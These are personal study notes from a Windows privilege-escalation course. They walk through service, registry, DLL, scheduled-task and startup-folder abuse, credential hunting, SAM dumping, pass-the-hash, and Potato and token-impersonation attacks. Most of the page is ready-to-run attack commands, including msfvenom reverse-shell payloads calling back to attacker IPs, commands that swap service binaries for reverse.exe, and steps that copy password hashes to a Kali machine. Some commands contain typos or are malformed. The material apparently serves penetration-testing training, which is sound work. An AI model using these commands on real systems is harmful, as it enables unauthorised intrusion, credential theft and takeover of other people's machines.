Window Privilege Escalation

Taking notes from Tib3rius's Window Privilege Escalation course

Kernel Exploit

Finding and using kernel exploit is usually a simple process.

1. Enumerate Windows version / patch level (system info)

2. Find matching exploits (Google, ExplitDB, Github)

3. Compile and run

Beware though, as Kernel exploits can often be unstable and may be one-shot or cause a system crash.

Tools

Window exploit suggester :

https://github.com/bitsadmin/wesng

Precompiled Kernal Exploit :

https://github.com/SecWiki/windows-kernel-exploits

Waston:

https://github.com/rasta-mouse/Watson

Service Exploits

Insecure Service Permissions

You can use accesschk.exe to check the user account's permissions on the "daclsvc" service:

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

sc qc daclsvc

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Listen with netcat in your local machine and execute it,

net start daclsvc

Unquoted Service Path

First, we need to check we have the permission to start the service

.\accesschk.exe /accpeteula -ucqv user unquotedsvc

Second , we need to check write permission on each directory where the binary exists path.

.\accesschk.exe /accepteula -uwdq C:\

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Create reverse.exe executable and copy to this directory and rename it common.exe:

Listen with netcat on port 53 and execute it, running with SYSTEM privileges:

net start unquotedsvc

Weak Registry Permissions

Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

sc qc regsvc

Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Check we can start the SERVICE nor not.

.\accesschk.exe /accepteula -ucqv user regsvc

Overwrite the ImagePath registry key to point to the reverse.exe executable you created:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Listen with netcat on port 53 and execute it.

net start regsvc

Insecure Service Executables

If you see file permission is writable by everyone:

sc qc filepermsvc

You can check with accesschk.exe and check also we can start service or not

.\accesschk.exe /accepteula -ucqv user filepermsvc

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Create the reverse.exe and replace the filepermservice.exe with it.

Listen with netcat on port 53 and execute this command. We will get reverse shell.

net start filepermsvc

In real world, don't forget to backup the original file.

DLL Hijacking

Check the service is running as SYSTEM PRIVILEGE.

sc qc dllsvc

In real world, you can copy the executable file to your machine and check with procmon what path is missing dll file.

Generate reversell with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f dll -o hijeckme.dll

Find missing .dll file path which is writable for us and move this file to that directory

Listen with netcat , stop the service and start the service back.

Registry

AutoRuns

To list the registry for AutoRun executables:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Using accesschk.exe, note that one of the AutoRun executables must be writable by everyone:

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

Start a listener on your localhost and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it

rdesktop 10.10.21.39

In real world, don't forget to backup the original program you overwrite.

AlwaysInstallElevated

Query the registry for AlwaysInstallElevated keys:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Note both keys are must be set to 1 (0x1)as in picture.If not, the exploit will not work.

On Linux, generate a reverse shell Windows Installer (reverse.msi) using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f msi -o reverse.msi

Transfer the reverse.msi file to the directory on Windows .Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:

msiexec /quiet /qn /i reverse.msi

Passwords

Registry

The registry can be searched for keys and values that contain the word "password":

reg query HKLM /f password /t REG_SZ /s

If you want to save some time, query this specific key to find admin AutoLogon credentials:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):

winexe -U 'admin%password123' --system //10.10.140.4 cmd.exe

Saved Creds

List any saved credentials:

cmdkey /list

Note that credentials for the "admin" user are saved. If they aren't, run the C:\PrivEsc\savecred.bat script to refresh the saved credentials.Start a listener on Kali and run the reverse.exe executable using runas with the admin user's saved credentials:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Search For Configuration Files

dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt

Security Account Manager (SAM)

The SAM and SYSTEM files can be used to extract user password hashes. Locat at:

C:\Windows\System32\config directory. The files are locked while windows is running.

Backups files may exist in the C:\Windows\Repair or C:\Windows\System32\config\RegBack directories.

Transfer the SAM and SYSTEM files to your Kali VM:

copy C:\Windows\Repair\SAM \10.10.10.10\kali
copy C:\Windows\Repair\SYSTEM \10.10.10.10\kali\

You can dump the password hashed with this tool.

git clone https://github.com/Neohapsis/creddump7.git
apt install python-crypto
python2 creddump7/pwdump.py SYSTEM SAM

Passing the Hash

When you get the hashes, you don't need to crack , you can use that hashes to spawn a shell.

pth-winexe -U 'admin%hash' //10.10.10.42 cmd.exe 
# use --system to get shell as system

Scheduled Tasks

Windows can be configured to run tasks at specific times, periodically (eg. every 5 mins ,same as crontab in linux) or when triggered by some event (eg. a user login).

Check out permission to this script, if we can have writable or not.

.\accesschk.exe /accepteula -quv user CleanUp.ps1

Copy our reverse shell to this directory and listen with netcat

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Insecure GUI Apps

Open AdminPaint in your desktop and check it is runing as system privilege or not

tasklist /V | findstr mspaint.ext

When it is running as admin , click on open file in mspaint app, and open cmd.exe

Type this file://c:/windows/system32/cmd.exe and it will pop up a command prompt as system privilege.

Startup Apps

Each user can define apps that start when they login, by placing shortcuts to them in a speific directory.

Windows also has a startup directory for apps that should start for all users:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

If we can create files in this directory, we can use our reverse shell and escalate privileges when an admin login.

Check we have writable files to the Startup directory

.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Run the C:\PrivEsc\CreateShortcut.vbs script which is create a new shortcut to your reverse.exe in the StartUp directory:

cscript C:\PrivEsc\CreateShortcut.vbs

When the user logout and login back as admin user, it will connect to our listener.

Installed Apps

In Exploit-DB

It will show us what app is vulnerable to local privilege escalation, you only need to check in your machine the vulnerable app installed or not . tasklist /V

Hot Potato

Hot Potato is the name of an attack that users a spoofing attack along with an NTLM relay attack to gain SYSTEM Privileges.This attack tricks windows into authenticating as the SYSTEM user to a fake HTTP server using NTLM . The NTLM credentials then get relayed to SMB in roder to gain command execution.

This attack works on Windows 7,8, early versions of Window 10 and their server counterparts.

.\potato.exe -ip 192.168.1.33 -cmd "C:\temp\reverse.exe -enable_httpserver true -enable_defender true -enable_spoof true -enable_haust true

Token Impersonation

Token impersonation is a technique you can use as local admin to impersonate another user logged on to a system. This is very useful in scenarios where you are local admin on a machine and want to impersonate another logged on user, e.g a domain administrator.

C:\Program Files (x86)\Jenkins>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled

In metasploit

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTE

Juicy Potato

https://github.com/ohpe/juicy-potato

.\juicypotato.exe -l 1337 -p c:\temp\rev.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

You can file CLID in here , CLSID is must be valid for the version of window we are using.

Will be update for more.